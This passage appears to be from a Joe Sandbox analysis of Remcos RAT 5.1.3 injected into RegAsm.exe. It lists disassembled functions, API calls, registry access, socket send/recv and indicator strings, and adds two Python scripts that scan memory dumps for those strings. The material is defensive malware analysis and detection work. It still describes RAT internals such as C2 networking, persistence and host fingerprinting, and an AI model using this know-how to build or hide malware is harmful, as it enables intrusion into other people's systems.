                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                              • API String ID: 1866151309-2070987746
                                                                                              • Opcode ID: 052e2c1fc00a128160fe2af221e6638f3098fcde06c4f7ab9f2ba3b538be2306
                                                                                              • Instruction ID: 1917af8823246703e0b69b16f84be6404e949fb754efc197e49d965c963a868a
                                                                                              • Opcode Fuzzy Hash: 052e2c1fc00a128160fe2af221e6638f3098fcde06c4f7ab9f2ba3b538be2306
                                                                                              • Instruction Fuzzy Hash: B01106B0A402405AC600F7A59D4BAAFB7589B44309F94017FFA45A31D3EAAD1D8D82AF
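The function listings above expose several plaintext artefacts of the injected RegAsm.exe image: the `Remcos` tray-icon text and the `Remcos v` / `5.1.3 Light` console banner, the `http://geoplugin.net/json.gp` geolocation lookup (handed to InternetOpenUrlW, so stored as UTF-16LE), the `TLS Handshake...` / `TLS Authentication Failed` / `Connection Refused` log strings of the connect routine, and the `SOFTWARE\Microsoft\Windows NT\CurrentVersion` key read for OS fingerprinting. The scanner below is an added example, not code from the Joe Sandbox report or from Remcos: it searches a memory dump for these literals in both ANSI and UTF-16LE, discounts the registry key (common in benign software), and recovers the banner version when the two literals happen to be stored back to back. The indicator set, the two-family threshold and the sample dump are assumptions constructed for the example, not data from the analysed sample.

```python
"""Scan a process memory dump for the Remcos strings listed in this report.

Added example, not part of the Joe Sandbox report or of Remcos. The
indicator strings come from the String ID / Strings fields of the function
listings; the sample buffer at the bottom is constructed so the script
runs offline.
"""
import re
from dataclasses import dataclass
from typing import Iterator, Optional, Tuple

# Strings handed to ...W APIs (InternetOpenUrlW) sit in memory as UTF-16LE,
# those handed to ...A APIs (lstrcpynA, RegOpenKeyExA) and console/log text
# as ANSI; every needle is therefore searched in both encodings.
INDICATORS = {
    "console_banner": b"Remcos v",
    "geoplugin_url": b"http://geoplugin.net/json.gp",
    "tls_handshake_log": b"TLS Handshake...",
    "tls_auth_failed_log": b"TLS Authentication Failed",
    "connection_refused_log": b"Connection Refused",
    "os_version_key": rb"SOFTWARE\Microsoft\Windows NT\CurrentVersion",
}

# Assumed for this example: the registry key is generic and never counts on
# its own; two distinct non-generic indicator families make a verdict.
GENERIC = {"os_version_key"}
MIN_FAMILIES = 2


@dataclass(frozen=True)
class Hit:
    name: str
    encoding: str  # "ansi" or "utf16le"
    offset: int


def _needles(s: bytes) -> Iterator[Tuple[str, bytes]]:
    yield "ansi", s
    yield "utf16le", s.decode("latin-1").encode("utf-16-le")


def scan(buf: bytes) -> list:
    """Return every indicator occurrence in buf, in both encodings, by offset."""
    hits = []
    for name, s in INDICATORS.items():
        for enc, needle in _needles(s):
            for m in re.finditer(re.escape(needle), buf):
                hits.append(Hit(name, enc, m.start()))
    return sorted(hits, key=lambda h: h.offset)


# "Remcos v" and "5.1.3 Light" are separate literals in the dumped image; the
# version is only recoverable if they are laid out adjacently (NUL-separated).
_VERSION = re.compile(rb"Remcos v\x00{0,4}(\d+\.\d+\.\d+(?: [A-Za-z]+)?)")


def remcos_version(buf: bytes) -> Optional[str]:
    m = _VERSION.search(buf)
    return m.group(1).decode("ascii") if m else None


def triage(buf: bytes) -> dict:
    """Summarise hits into a verdict a responder can act on."""
    hits = scan(buf)
    families = {h.name for h in hits} - GENERIC
    return {
        "hits": len(hits),
        "families": sorted(families),
        "remcos": len(families) >= MIN_FAMILIES,
        "version": remcos_version(buf),
    }


# Constructed sample dump (not data from the analysed sample): filler bytes
# around the literals, in the encodings the API names above imply.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"Remcos v\x005.1.3 Light\x00CONOUT$\x00"
    + b"\x90" * 32
    + "http://geoplugin.net/json.gp".encode("utf-16-le") + b"\x00\x00"
    + b"TLS Handshake...\x00Connection Refused\x00"
    + rb"SOFTWARE\Microsoft\Windows NT\CurrentVersion" + b"\x00"
    + b"\xcc" * 64
)

if __name__ == "__main__":
    for h in scan(SAMPLE_DUMP):
        print(f"{h.offset:#08x} {h.encoding:8} {h.name}")
    print(triage(SAMPLE_DUMP))
```

Point it at a dump of the injected process (the report's source is the 0x400000 image inside RegAsm.exe), not at the original Order.vbs, whose payload is still encoded. On the wire, a request to geoplugin.net by itself is weak evidence, since it is a public geolocation service; combine it with the process context the report shows (RegAsm.exe reached through a wscript/powershell chain) before alerting.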

                                                                                              Control-flow Graph

                                                                                              • Rendered graph not reproduced; basic blocks 43c698-43c71c
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00432251,00000000,00467F30,?,004322D5,00000000,00000000,00000000,00000000,00000000,?,00467F30), ref: 0043C69D
                                                                                              • _free.LIBCMT ref: 0043C6D2
                                                                                              • _free.LIBCMT ref: 0043C6F9
                                                                                              • SetLastError.KERNEL32(00000000), ref: 0043C706
                                                                                              • SetLastError.KERNEL32(00000000), ref: 0043C70F
                                                                                              Strings
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0043C69C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              • API String ID: 3170660625-1068371695
                                                                                              • Opcode ID: b6e52e1b2361af0078c8cb005ea30ec949651885794170a776e383e0b3a38326
                                                                                              • Instruction ID: bc4159b708f5a4293034d87da73aa0aa4050a2000ac7bf9c59918bad1b3ef628
                                                                                              • Opcode Fuzzy Hash: b6e52e1b2361af0078c8cb005ea30ec949651885794170a776e383e0b3a38326
                                                                                              • Instruction Fuzzy Hash: E101DB7554460167861167766CCAD6B175AABDA3A9F20202BFD15B2292EB6CCC01431D

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,?), ref: 00401BDC
                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00401BEF
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,;J@,00401AC2,?,?,;J@,?,00000000,00000000,00000000,00000000,?), ref: 00401BFA
                                                                                              • CloseHandle.KERNEL32(?,?,;J@,00401AC2,?,?,;J@,?,00000000,00000000,00000000,00000000,?), ref: 00401C03
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                              • String ID: ;J@
                                                                                              • API String ID: 3360349984-2872391036
                                                                                              • Opcode ID: ad49de1a7ead4e787bf1e6030da1dbcc69cdf8ec2f71a5055db8e1f4714ca59b
                                                                                              • Instruction ID: 4c3b87f8b26e421484a5416da664749deae10a416ef7c933f3c1033e637f22ec
                                                                                              • Opcode Fuzzy Hash: ad49de1a7ead4e787bf1e6030da1dbcc69cdf8ec2f71a5055db8e1f4714ca59b
                                                                                              • Instruction Fuzzy Hash: E2417171A00318ABDF11EBA1CD459EEB7BDAF14328F04012AF552B32D1DB78A905C764

                                                                                              Control-flow Graph (rendered as an image in the original report; the nodes and edges recovered from it)
                                                                                              • 415a14-415a69: call 42ec70, RegisterClassExA -> 415a8b (on failure) or 415a6b-415a83
                                                                                              • 415a6b-415a83: CreateWindowExA -> 415a85
                                                                                              • 415a85: GetLastError -> 415a8b
                                                                                              • 415a8b -> 415a8d-415a93 (final block)
                                                                                              APIs
                                                                                              • RegisterClassExA.USER32(00000030), ref: 00415A60
                                                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 00415A7B
                                                                                              • GetLastError.KERNEL32 ref: 00415A85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                                              • String ID: 0$MsgWindowClass
                                                                                              • API String ID: 2877667751-2410386613
                                                                                              • Opcode ID: 171986d441cc0fdba3aa014d35ecb3b22f7763cc9b94a58783fd8344a93d0701
                                                                                              • Instruction ID: f63745ccf0cf2e059edbdb5c197b6e0c42188d60e7481a6116dcff7c28758ec6
                                                                                              • Opcode Fuzzy Hash: 171986d441cc0fdba3aa014d35ecb3b22f7763cc9b94a58783fd8344a93d0701
                                                                                              • Instruction Fuzzy Hash: 9A0129B5D0021DAFDB00DFD59CC49EFBBBCFA49395F40453AF814A6240E77449088BA4
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,0041517C,?,?,?,?,?), ref: 004150EF
                                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041517C,?,?,?,?,?), ref: 004150FC
                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,?,0041517C,?,?,?,?,?), ref: 00415109
                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041517C,?,?,?,?,?), ref: 0041511C
                                                                                              Strings
                                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041510F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                              • API String ID: 3024135584-2418719853
                                                                                              • Opcode ID: cada3afb149ddae7817ec8520d72f52702fcff0883308cdb62645d729372a309
                                                                                              • Instruction ID: 51ccb5ed899ab14f6f5ebcdeb72e3bd2cd834a6bdf3d7eb62036f2204a89400a
                                                                                              • Opcode Fuzzy Hash: cada3afb149ddae7817ec8520d72f52702fcff0883308cdb62645d729372a309
                                                                                              • Instruction Fuzzy Hash: 5FE048B694420877D6102BA5AC4FC6F7B6CE78EA13B100666FE1191193D97454054675
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(00000001,00000000,00468140,?,?,?,?,0040F696,?,00000001), ref: 00401D9F
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00468140,?,?,?,?,0040F696,?,00000001), ref: 00401DEB
                                                                                              • CreateThread.KERNEL32(00000000,00000000,00401F6E,?,00000000,00000000), ref: 00401DFE
                                                                                              Strings
                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 00401DB2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Create$EventLocalThreadTime
                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                              • API String ID: 2532271599-1507639952
                                                                                              • Opcode ID: 643c94547ab4d4b904c412cc660adc4f41d1d22a7e1bff7dec1c8fcd1f37be2e
                                                                                              • Instruction ID: 14f6ff0f928cbc8e7ea3c6c14a44142007350dfeddf002f6c212d4b5ee299eb4
                                                                                              • Opcode Fuzzy Hash: 643c94547ab4d4b904c412cc660adc4f41d1d22a7e1bff7dec1c8fcd1f37be2e
                                                                                              • Instruction Fuzzy Hash: FE11E3319042847BCB20A77B8C0DEAB7FA89BD3710F04056FF841522A2D6B89485C7A6
                                                                                              APIs
                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0040D211
                                                                                              • RegSetValueExA.KERNEL32(?,00459EE8,00000000,?,00000000,00000000,00467F30,?,?,0040A763,00459EE8,5.1.3 Light), ref: 0040D239
                                                                                              • RegCloseKey.KERNEL32(?,?,?,0040A763,00459EE8,5.1.3 Light), ref: 0040D244
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID: 5.1.3 Light
                                                                                              • API String ID: 1818849710-1145503539
                                                                                              • Opcode ID: 991656ebcf3dbdb5e087e2271452528c92513c84ec576b1201f88ea9e43e64e4
                                                                                              • Instruction ID: ebd1829d961e48a05cccc46ad5987234d1f606a9772c4a5001abe3e09c24b449
                                                                                              • Opcode Fuzzy Hash: 991656ebcf3dbdb5e087e2271452528c92513c84ec576b1201f88ea9e43e64e4
                                                                                              • Instruction Fuzzy Hash: 8FF0F632800108FBCB00AFA0DD05EEE776CEF04304F10417ABE09A6091D6359E08DA58
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,time,?,?,0040931D,time), ref: 0040CFA3
                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040931D,time), ref: 0040CFB7
                                                                                              • RegCloseKey.KERNEL32(?,?,?,0040931D,time), ref: 0040CFC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: time
                                                                                              • API String ID: 3677997916-1872009285
                                                                                              • Opcode ID: 401d4be426691079ecc9c4ee1270c2ab9911a3fb7cdc295d6fdecd50ed41ba30
                                                                                              • Instruction ID: 01e9e4454c5815cd9fe83fd72c8224fe9163c15e3a8ae46bcaeb397ef7d6e021
                                                                                              • Opcode Fuzzy Hash: 401d4be426691079ecc9c4ee1270c2ab9911a3fb7cdc295d6fdecd50ed41ba30
                                                                                              • Instruction Fuzzy Hash: FDE06D36901238FBDB204BA29D4DDEB7F6DDF477A4F010265BD08A2151D2354E10E6E5
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(0040F689,00468140,00467C58,?,?,?,?,?,?,0040F689,?,00000001,0000004C,00000000), ref: 00401E49
                                                                                                • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              • GetLocalTime.KERNEL32(0040F689,00468140,00467C58,?,?,?,?,?,?,0040F689,?,00000001,0000004C,00000000), ref: 00401EA1
                                                                                              Strings
                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 00401E3E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                              • API String ID: 481472006-1507639952
                                                                                              • Opcode ID: 358479353bd55bbf4045116b195f3fc638d59cad8268215c9071536c8c9b5d82
                                                                                              • Instruction ID: 1d52dbcb1ff0e0c2d988e19544ba4eb29f5678dad8abbd2e12691aec51a988aa
                                                                                              • Opcode Fuzzy Hash: 358479353bd55bbf4045116b195f3fc638d59cad8268215c9071536c8c9b5d82
                                                                                              • Instruction Fuzzy Hash: 9D21D171E0424067CB10B7BAED0A7EEBB245793345F14413EEC01272E2EEB85949C7AB
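The function entries above recover several plaintext indicators from the unpacked RegAsm.exe memory image: the "5.1.3 Light" version string written to a key under HKEY_CURRENT_USER (0x80000001), the "KeepAlive | Enabled | Timeout: " log prefix used by the keep-alive thread, the "MsgWindowClass" window class name, and the ASCII-art console banner. The following triage helper is an added example and is not part of the Joe Sandbox report or of the Remcos code base: it scans a raw process memory dump for those indicators, maps hits back to virtual addresses using the report's 0x400000 image base, and parses a timeout value if one follows the KeepAlive prefix. The sample buffer is constructed for the demonstration, and the assumption that a decimal timeout follows the prefix at runtime is not something the report itself shows.

```python
"""
Memory-dump triage for Remcos indicators recovered by the sandbox report.

Added example, not code from the report or from Remcos. Indicator bytes are
taken verbatim from the report's string tables; the SAMPLE_DUMP buffer and
the "digits follow the KeepAlive prefix" assumption are constructed here.
"""
import re
from dataclasses import dataclass

# Image base from the report: "Offset: 00400000, based on PE: true".
IMAGE_BASE = 0x400000

# Indicators quoted verbatim from the report's String ID fields.
REMCOS_STRINGS = {
    "version": b"5.1.3 Light",
    "keepalive_prefix": b"KeepAlive | Enabled | Timeout: ",
    "window_class": b"MsgWindowClass",
    # Leading fragment of the banner printed via SetConsoleTextAttribute.
    "banner": b"______ (_____ \\ _____) )_____ ____ ____ ___ ___",
}

# Assumption (not shown in the report): the keep-alive log line is the
# prefix followed by a decimal timeout.
KEEPALIVE_RE = re.compile(rb"KeepAlive \| Enabled \| Timeout: (\d+)")


@dataclass(frozen=True)
class Hit:
    name: str      # indicator key from REMCOS_STRINGS
    offset: int    # byte offset inside the dump
    value: bytes   # matched indicator bytes


def scan(buf: bytes, indicators=REMCOS_STRINGS) -> list[Hit]:
    """Return every occurrence of every indicator, ordered by offset."""
    hits: list[Hit] = []
    for name, needle in indicators.items():
        start = 0
        while (pos := buf.find(needle, start)) != -1:
            hits.append(Hit(name, pos, needle))
            start = pos + 1          # keep going; overlapping repeats are fine
    return sorted(hits, key=lambda h: h.offset)


def to_va(offset: int, base: int = IMAGE_BASE) -> int:
    """Map a dump offset to a virtual address for a dump taken at `base`."""
    return base + offset


def keepalive_timeouts(buf: bytes) -> list[int]:
    """Timeout values (assumed decimal) that follow the KeepAlive prefix."""
    return [int(m) for m in KEEPALIVE_RE.findall(buf)]


def is_likely_remcos(buf: bytes) -> bool:
    """Require two distinct indicator families to reduce single-string noise."""
    return len({h.name for h in scan(buf)}) >= 2


# Constructed sample dump: NUL padding around three of the indicators.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"MsgWindowClass\x00"
    + b"\x00" * 16
    + b"5.1.3 Light\x00"
    + b"\x00" * 32
    + b"KeepAlive | Enabled | Timeout: 60000\r\n"
    + b"\x00" * 8
)


def report(buf: bytes) -> list[str]:
    """Human-readable lines, one per hit, with the mapped virtual address."""
    lines = [f"{h.name:<17} off=0x{h.offset:06x} va=0x{to_va(h.offset):08x}"
             for h in scan(buf)]
    for t in keepalive_timeouts(buf):
        lines.append(f"keepalive timeout = {t}")
    lines.append(f"verdict: {'likely Remcos' if is_likely_remcos(buf) else 'no match'}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_DUMP)))
```

On a real dump, feed `scan()` the raw bytes of the `.sdmp` file named in the report; because that dump starts at the PE image base, `to_va()` returns addresses directly comparable to the `ref:` addresses listed in each function entry.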
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0043B648
                                                                                                • Part of subcall function 0043B5D9: RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                                                                              • RtlReAllocateHeap.NTDLL(00000000,?,?,6ZB,0000000F,?,0042A8FC,00000000,0000000F,004274BC,?,6ZB,00429466,?,?,00000000), ref: 0043B684
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap$_free
                                                                                              • String ID: 6ZB
                                                                                              • API String ID: 1482568997-119657810
                                                                                              • Opcode ID: f3172a60f651ac873e8c23c5784766f2a69c96e2c7a7c66e4e6bdf76f955f2f4
                                                                                              • Instruction ID: fe16a153650bf957c02c75a4bda108abfe66e8103c26be9158aaf2df18b8f7a5
                                                                                              • Opcode Fuzzy Hash: f3172a60f651ac873e8c23c5784766f2a69c96e2c7a7c66e4e6bdf76f955f2f4
                                                                                              • Instruction Fuzzy Hash: 81F0C83160060466DB212B26AC07F6B3758DFD9774F14612BFB14662A2EF2CD80185DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: db561e35d30af508af9f2af5912aba34c01efa7380076f61f9db343e10e7c5c8
                                                                                              • Instruction ID: f6d658ae2e7e1fcbb9d214fdc8f151dc648680e7b03e9b6c7994593d924eff1b
                                                                                              • Opcode Fuzzy Hash: db561e35d30af508af9f2af5912aba34c01efa7380076f61f9db343e10e7c5c8
                                                                                              • Instruction Fuzzy Hash: 6051C171E0121AABCB10DFA6C845EEF7BB4AF5D314F10205BF804A72D1D6789902CB69
                                                                                              APIs
                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              • WaitForSingleObject.KERNEL32(?,00000000,?,00000008,00000004,00000000,0000000C,00000000,?,?,00467C58), ref: 0040196B
                                                                                              • SetEvent.KERNEL32(?,?,00467C58,?,?,?,?,?,?,004049F5,000000B2), ref: 00401999
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EventObjectSingleWaitsend
                                                                                              • String ID:
                                                                                              • API String ID: 3963590051-0
                                                                                              • Opcode ID: 27af60bf33b0b41a9ccf68358aa7ff0c11537270062b2fdb526a3334bb4c6941
                                                                                              • Instruction ID: 45700d370154fa5f4d62816e2196c9d0dd2bc9e8c8792b5ef317c5eded93a812
                                                                                              • Opcode Fuzzy Hash: 27af60bf33b0b41a9ccf68358aa7ff0c11537270062b2fdb526a3334bb4c6941
                                                                                              • Instruction Fuzzy Hash: 92213071900305ABC706EBA1D9959EEB728EF14314B10813BF626771E1DF786D09C794
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,00000000), ref: 0040D057
                                                                                              • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000400), ref: 0040D074
                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 0040D07F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: ace8b4fc2de24946ab29f44ec40981b8a586b02f85e041542c5e1d0f27546c52
                                                                                              • Instruction ID: d1556b6a21c4095f6825b550070d3a1ea107f6ab0172e99dcae801f88fb81ba0
                                                                                              • Opcode Fuzzy Hash: ace8b4fc2de24946ab29f44ec40981b8a586b02f85e041542c5e1d0f27546c52
                                                                                              • Instruction Fuzzy Hash: A301A27A900128BBCB209B91DC48DEFBB7DDB85354F000166BB09B3140DA348E1A97A8
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
                                                                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 0040D1CB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: fa00813bcb7015f133936317acef8d2907e127f5beb0b60e69fb4cf08a1841a2
                                                                                              • Instruction ID: cc6cebfca2548575ee20f86db8a71b62532355b0905f8b8d9a1577e7996aa7c0
                                                                                              • Opcode Fuzzy Hash: fa00813bcb7015f133936317acef8d2907e127f5beb0b60e69fb4cf08a1841a2
                                                                                              • Instruction Fuzzy Hash: C3016D3680412DBBCF21AFD1DC45DEB7F38EF06354F008165BE0866161DA35896AEBA4
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0040CFF6
                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00467F30), ref: 0040D014
                                                                                              • RegCloseKey.KERNEL32(?), ref: 0040D01F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,00401A75,00000000,?,?,?,?,00467C58), ref: 004019CD
• SetEvent.KERNEL32(?,?,00401A75,00000000,?,?,?,?,00467C58), ref: 004019E9
• recv.WS2_32(?,?,?,00000000), ref: 004019FE
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: EventObjectSingleWaitrecv
• String ID:
• API String ID: 311754179-0
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,00459594), ref: 0040D31E
• RegSetValueExA.KERNEL32(00459594,000000AF,00000000,00000004,00000001,00000004,?,?,?,00408639,00459A08,00000001,000000AF,00459594), ref: 0040D339
• RegCloseKey.KERNEL32(00459594,?,?,?,00408639,00459A08,00000001,000000AF,00459594), ref: 0040D344
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00413DB6
Strings
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0043E452,0044A1E5,00000000,00000000,00000000,00000000,00000000), ref: 0043DFB1
• GetLastError.KERNEL32(?,0043E452,0044A1E5,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043DFDA
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorFileLastWrite
